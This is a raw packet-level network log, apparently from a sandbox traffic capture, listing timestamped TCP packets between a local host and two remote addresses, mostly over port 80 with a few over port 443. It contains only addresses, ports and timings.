Sep 27, 2024 00:29:12.079794884 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079806089 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079807043 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079816103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079826117 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079837084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079838991 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079849005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079859972 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079860926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079879999 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079895020 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.079977989 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079988956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.079999924 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080009937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080019951 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080024958 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080029964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080040932 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080049038 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080077887 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080095053 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080106020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080116034 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080126047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080127954 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080137014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080152988 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080188990 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080240965 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080257893 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080267906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080276966 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080286980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080291033 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080298901 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080307961 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080311060 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080318928 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080328941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080338955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080338955 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080349922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080360889 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080365896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080370903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080373049 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080383062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080395937 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080420971 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080657005 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080667973 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080677986 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080688953 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080698967 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080701113 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080708981 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080717087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080719948 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080729961 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080739975 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080749989 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080754995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080760956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080776930 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080780983 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080786943 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080796957 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080806971 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080817938 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080820084 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080828905 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080838919 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080842972 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080849886 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080859900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.080861092 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080878973 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.080893993 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081186056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081196070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081207037 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081217051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081227064 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081234932 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081238031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081250906 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081255913 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081265926 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081275940 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081279993 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081290007 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081306934 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081314087 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081317902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081327915 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081337929 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081338882 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081350088 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081353903 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081360102 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081370115 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081371069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081381083 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081392050 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081404924 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081422091 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081686974 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081696987 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081707001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081717968 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081721067 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081727982 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081734896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081737995 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081756115 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081759930 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081765890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081775904 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081782103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081792116 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081803083 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081811905 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081813097 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081823111 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081835985 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081842899 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081845999 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081856012 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081866980 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081876040 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.081878901 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.081904888 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168381929 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168416977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168427944 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168451071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168461084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168463945 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168472052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168483019 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168493032 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168507099 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168539047 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168539047 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168586016 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168596983 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168628931 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168662071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168672085 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168683052 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168693066 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168693066 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168718100 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168797016 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168807030 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168817997 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168828011 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168838024 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168838978 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168875933 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168886900 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168926001 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168936014 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168946028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168956041 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168966055 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168973923 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.168977022 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.168988943 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.169020891 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.169066906 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169078112 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169087887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169097900 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169102907 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.169110060 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169121027 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169142008 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.169157028 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169168949 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169181108 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.169198036 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.169203997 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170190096 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170207977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170226097 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170241117 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170270920 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170270920 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170281887 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170293093 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170303106 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170316935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170325994 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170355082 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170371056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170423031 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170423031 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170432091 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170443058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170466900 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170486927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170497894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170506954 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170519114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170525074 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170528889 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170538902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170561075 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170572042 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170607090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170618057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170628071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170640945 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170666933 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170738935 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170749903 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170762062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170773029 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170778990 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170783043 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170793056 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170804024 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170830965 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170924902 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170936108 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170947075 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170952082 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170955896 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.170962095 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170978069 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.170984983 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171014071 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171040058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171075106 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171127081 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171138048 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171149015 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171159983 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171180964 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171201944 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171260118 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171271086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171281099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171291113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171302080 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171318054 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171339035 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171339989 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171350956 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171360970 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171370029 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171371937 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171390057 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171400070 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171401978 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171428919 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171536922 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171547890 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171556950 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171572924 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171572924 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171590090 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171600103 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171605110 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171611071 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171621084 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171631098 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171632051 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171646118 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171654940 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171664953 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171672106 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171677113 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171686888 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171713114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171736956 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171847105 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171858072 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171868086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171878099 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171890020 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171895027 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171900988 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171911955 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.171921015 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.171947956 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.172038078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172066927 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172077894 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172080040 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.172116995 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.172163010 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172173977 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172183990 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172194004 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172200918 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.172204018 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.172235966 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.217508078 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.217612982 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:12.218189955 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:12.218197107 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.219954967 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.220308065 CEST	57913	443	192.168.2.6	5.75.211.162
Sep 27, 2024 00:29:12.220314980 CEST	443	57913	5.75.211.162	192.168.2.6
Sep 27, 2024 00:29:12.259772062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259804964 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259815931 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259843111 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.259927988 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259938002 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259947062 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259974003 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.259977102 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.259989023 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260001898 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260010004 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260015011 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260029078 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260036945 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260050058 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260055065 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260070086 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260083914 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260083914 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260103941 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260116100 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260126114 CEST	80	57911	147.45.44.104	192.168.2.6
Sep 27, 2024 00:29:12.260126114 CEST	57911	80	192.168.2.6	147.45.44.104
Sep 27, 2024 00:29:12.260138035 CEST	80	57911	147.45.44.104	192.168.2.6
